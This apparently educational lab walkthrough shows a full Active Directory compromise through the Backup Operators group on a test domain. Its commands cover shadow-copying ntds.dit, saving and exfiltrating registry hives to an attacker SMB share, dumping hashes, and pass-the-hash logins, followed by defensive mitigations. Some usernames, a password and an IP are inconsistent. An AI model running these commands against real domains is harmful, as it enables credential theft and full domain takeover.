Introduction & Overview

The Backup Operators group is a default built-in security group in every Windows Active Directory domain. Members are granted two powerful Windows privileges — SeBackupPrivilege and SeRestorePrivilege — which were designed to allow trusted personnel to back up and restore files regardless of normal NTFS permissions. While legitimate in intent, these privileges can be weaponised by an attacker to extract the Active Directory database (ntds.dit) from a Domain Controller, thereby obtaining every password hash in the domain.

This article documents a complete end to end attack chain against the ignite.local test domain using the Backup Operators misconfiguration. It covers four different techniques to add a low-privileged user to the group, exploitation via DiskShadow and robocopy, offline hash extraction with Impacket, and finally a Pass-the-Hash login as Domain Administrator.

The attacker already possesses the Domain Administrator credentials (administrator / Ignite@987), which is a realistic scenario after initial compromise — for example through Kerberoasting, LLMNR poisoning, or AS-REP roasting. The goal is to demonstrate how a new low-privilege user can be elevated via the Backup Operators group and used to fully compromise the domain.

Table of Contents

• Introduction & Overview
• Attack Prerequisites & Lab Setup
• Creating a Domain User Account
• Adding the User to Backup Operators
  • Method 1: Active Directory Users and Computers (GUI)
  • Method 2: BloodyAD
  • Method 3: net rpc (Samba Tools)
  • Method 4: Python LDAP Script (addusertogroup.py)
• Verifying Group Membership
  • Method A: BloodyAD — msds-memberTransitive
  • Method B: net rpc group members
  • Method C: ldeep LDAP Query
• Exploitation
  • Remote Access via Evil-WinRM
  • Shadow Copy & ntds.dit Extraction
    • Method 1: Creating the DiskShadow Script
    • Uploading and Executing DiskShadow
    • Copying ntds.dit
    • Saving the SYSTEM Registry Hive
    • Downloading Files to Kali
  • Dumping NTLM Hashes with impacket-secretsdump
  • Pass-the-Hash as Administrator
  • Alternative Methods
    • Method 2: NetExec
    • Method 3: impacket-reg + SMB Server
    • Starting SMB Server on Kali
    • Remote Registry Backup
    • Extracting Hashes with pypykatz
    • Gaining Shell via impacket-psexec
  • Defensive Mitigations
  • Summary

Attack Prerequisites & Lab Setup

Creating a Domain User Account

The first step is to create a new standard domain user account named raj with the password Password@1. This is done from the Domain Controller’s command prompt using the net user command with the /domain flag, which writes the account directly into Active Directory.

Command executed on the Domain Controller (cmd.exe as Administrator):

net user raj Password@1 /add /domain

Adding the User to Backup Operators

The Backup Operators group (CN=Backup Operators,CN=Builtin) is a domain-local security group. Any member inherits SeBackupPrivilege and SeRestorePrivilege. Below are four different methods to perform this operation, which are useful in different attack scenarios depending on which tools and protocols are available.

Method 1: Active Directory Users and Computers (GUI)

The most straightforward approach is when you have an RDP session or console access to the DC.

• Open ADUC — Launch dsa.msc (Active Directory Users and Computers) on a Domain Controller or admin machine
• Locate the user — Navigate to the Users container and find the user raj
• Right-click the user — A context menu appears with multiple options
• Click “Add to a group…” — This is the highlighted option (boxed in red), which opens the group selection dialog
• Type group name — In the dialog that follows, type Backup Operators and click OK
• Confirm — A success message confirms raj is now a member of Backup Operators

Method 2: BloodyAD

BloodyAD is a Python tool that communicates directly with the AD LDAP/MS-RPC interfaces and can modify group memberships without requiring a domain-joined machine. From the Kali attacker machine:

bloodyAD --host 192.168.1.11 -d ignite.local -u administrator -p 'Ignite@987' add groupMember "Backup Operators"  raj

Method 3: net rpc (Samba tools)

The Samba suite includes net, which can interact with Windows RPC endpoints. The group addmem subcommand adds a user to an AD group remotely via the SAMR (Security Account Manager Remote) protocol.

net rpc group addmem "Backup Operators" "raj" -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11

Method 4: Python LDAP Script (addusertogroup.py)

A custom Python script leveraging the ldap3 library can also modify group membership. This is useful in environments where other tools are blocked or where you need to embed the operation in a larger automation pipeline.

python3 addusertogroup.py -d ignite.local -g "Backup Operators" -a raj -u administrator -p Ignite@987

Verifying Group Membership

Before proceeding with exploitation, confirm that raj is now a member of the Backup Operators group. Three verification methods are shown below.

Method A: BloodyAD — msds-memberTransitive

bloodyAD --host 192.168.1.11 -d ignite.local -u ankur -p Password@1  get object "Backup Operators" --attr msds-memberTransitive

Method B: net rpc group members

net rpc group members "Backup Operators" -U ignite.local/ankur%'Password@1' -S 192.168.1.11

Method C: ldeep LDAP Query

All three methods confirm that raj is now a member of Backup Operators. Note that membership changes propagate almost instantly in a lab environment, but in production domains there may be a short replication delay across DCs.

Exploitation

Remote Access via Evil-WinRM

Evil-WinRM is a Ruby-based shell that communicates over WS-Management (WinRM / TCP 5985). It provides an interactive PowerShell session and includes file upload/download capabilities, which will be essential later in the attack.

evil-winrm -i 192.168.1.11 -u raj -p Password@1

After connecting, run whoami /priv to inspect the enabled privileges:

The two critical privileges are confirmed as Enabled: SeBackupPrivilege allows reading any file regardless of its ACL, and SeRestorePrivilege allows writing any file. Together they enable extraction of locked system files such as ntds.dit.

Shadow Copy & ntds.dit Extraction

ntds.dit is the Active Directory database file located at C:\Windows\NTDS\ntds.dit. Even with SeBackupPrivilege, the file cannot be directly copied while the NTDS service is running because it is exclusively locked by the Extensible Storage Engine. The solution is to use the Volume Shadow Copy Service (VSS) to create a point-in-time snapshot of the C: volume, then read ntds.dit from the snapshot.

DiskShadow.exe is a Microsoft-signed tool built into Windows Server that automates VSS operations using a script file. Create the following script on Kali:

nano raj.dsh

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

unix2dos raj.dsh

Script line-by-line explanation:

• set context persistent nowriters – (Create a persistent shadow copy that survives reboots, excluding VSS writers (faster).)
• add volume c: alias raj (Add the C: volume to the shadow set and alias the resulting snapshot as ‘raj’.)
• create – Create the shadow copy.
• expose %raj% z: – Mount the snapshot as drive Z: so it is accessible as a normal drive letter.

Convert the script to Windows (CRLF) line endings before uploading:

Uploading and Executing DiskShadow

Back in the Evil-WinRM session, create a working directory, upload the script, and run it:

upload raj.dsh

The shadow copy is now accessible at Z:\. This is an exact read-only clone of C: at the moment of snapshot creation, bypassing all file locks held by running services.

Copying ntds.dit

robocopy with the /b flag uses Backup semantics — it explicitly requests SeBackupPrivilege for the copy operation, which allows it to bypass the NTFS ACL on ntds.dit.

diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit

Saving the SYSTEM Registry Hive

ntds.dit is encrypted with the PEK (Password Encryption Key), which itself is protected by the boot key (SysKey) stored in the SYSTEM registry hive. Without this hive, the hashes cannot be decrypted. Save it to disk:

reg save hklm\system c:\Temp\system

Downloading Files to Kali

With the ntds.dit file obtained, we extract the SYSTEM hive using the reg save command. Now, both files are in the Temp directory and can be transferred to Kali Linux using the download command.

download ntds.dit
download system

Dumping NTLM Hashes with impacket-secretsdump

Finally, on the Kali Linux shell, use Impacket’s secretsdump to extract password hashes from the ntds.dit file and SYSTEM hive:

impacket-secretsdump -ntds ntds.dit -system system local

Pass-the-Hash as Administrator

With the Administrator NT hash in hand, a Pass-the-Hash (PtH) attack can be performed. Evil-WinRM supports NTLM hash authentication via the -H flag, eliminating the need to crack the hash or know the plaintext password.

evil-winrm -i 192.168.1.11 -u administrator -H 32196b56ffe6f45e294117b91a83bf38

Method 2: NetExec

NetExec includes a dedicated backup_operator module that automates the entire registry backup and hash dumping flow in a single command. It uses Backup Operators membership to remotely save the SAM, SYSTEM, and SECURITY hives to SYSVOL and retrieves them automatically.

nxc smb 192.168.1.11 -u raj -p Password@1 -M backup_operator

Method 3: impacket-reg + SMB Server

impacket-reg allows remote registry operations over SMB/DCE-RPC. Combined with impacket-smbserver hosting a writable share on the Kali machine, this approach saves the hives directly to the attacker without touching the DC’s local disk.

Step 1 — Start an SMB server on Kali

impacket-smbserver share $(pwd) -smb2support

Remote registry backup directly to the share

dump the SAM and SYSTEM hives from the target machine, using the impacket-reg tool.

impacket-reg "ignite.local"/"raj":"Passworda1"@"192.168.1.11" backup -o '\\\\192.168.1.17\\share'

The three hive files (SAM.save, SYSTEM.save, SECURITY.save) are written directly to the attacker’s share. Feed them to impacket-secretsdump for offline parsing:

Then, use pypykatz to extract NTLM password hashes from the dumped SAM and SYSTEM files:

pypykatz registry --sam SAM.save SYSTEM.save

Finally, use impacket-psexec to gain a shell on the target machine as an administrator user using the extracted hash, achieving privilege escalation on the Windows Domain Controller.

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32196b56ffe6f45e294117b91a83bf38 administrator@192.168.1.48

Defensive Mitigations

Understanding how this attack works allows defenders to implement effective controls. The following measures significantly reduce the risk of Backup Operators abuse.

Audit Backup Operators Membership

The Backup Operators group should be nearly empty in most environments. Regularly audit its membership with PowerShell or BloodHound. Any unexpected members should be investigated immediately. Use ‘Get-ADGroupMember -Identity “Backup Operators”‘ on a schedule.

Restrict WinRM (TCP 5985/5986)

Block WinRM access from non-administrative workstations using Windows Firewall GPO. Consider requiring a jump host or PAW (Privileged Access Workstation) for all administrative remote connections to Domain Controllers.

Enable Advanced Audit Policies

Enable Audit Sensitive Privilege Use (Event IDs 4672, 4673) to detect when SeBackupPrivilege is exercised. Also monitor Event ID 4732 (user added to group) and 8222 (VSS shadow copy created) in the Application log.

Credential Guard & Protected Users

Enable Windows Defender Credential Guard and place privileged accounts in the Protected Users security group. Protected Users members cannot use NTLM authentication, which defeats Pass-the-Hash attacks.

Tiered Administration Model

Implement Microsoft’s Privileged Access Model (PAM) / Tier 0 model. Domain Controller management should only be performed from Tier 0 PAWs using dedicated admin accounts that are never used on lower-tier systems.

Monitor DiskShadow and robocopy Usage

Alert on diskshadow.exe execution on Domain Controllers (it has no legitimate regular use). Similarly alert on robocopy executions that target NTDS or system hive paths. Use Sysmon Event ID 1 (Process Create) with appropriate filters.

LAPS and Unique Local Credentials

Deploy Microsoft LAPS (Local Administrator Password Solution) to prevent lateral movement using shared local administrator passwords. This limits the blast radius even if a hash is extracted.

Regular ntds.dit Integrity Monitoring

Use File Integrity Monitoring (FIM) tools to alert when ntds.dit or the SYSTEM hive is accessed by processes other than the NTDS service. Microsoft Defender for Identity (MDI) provides this capability out of the box for AD environments.

Summary

This article demonstrated a complete Active Directory domain compromise stemming from a single misconfiguration: an account being a member of the built-in Backup Operators group. The attack required no exploit, no vulnerability, and no zero-day — only the privileges that Windows grants to every member of this group by design.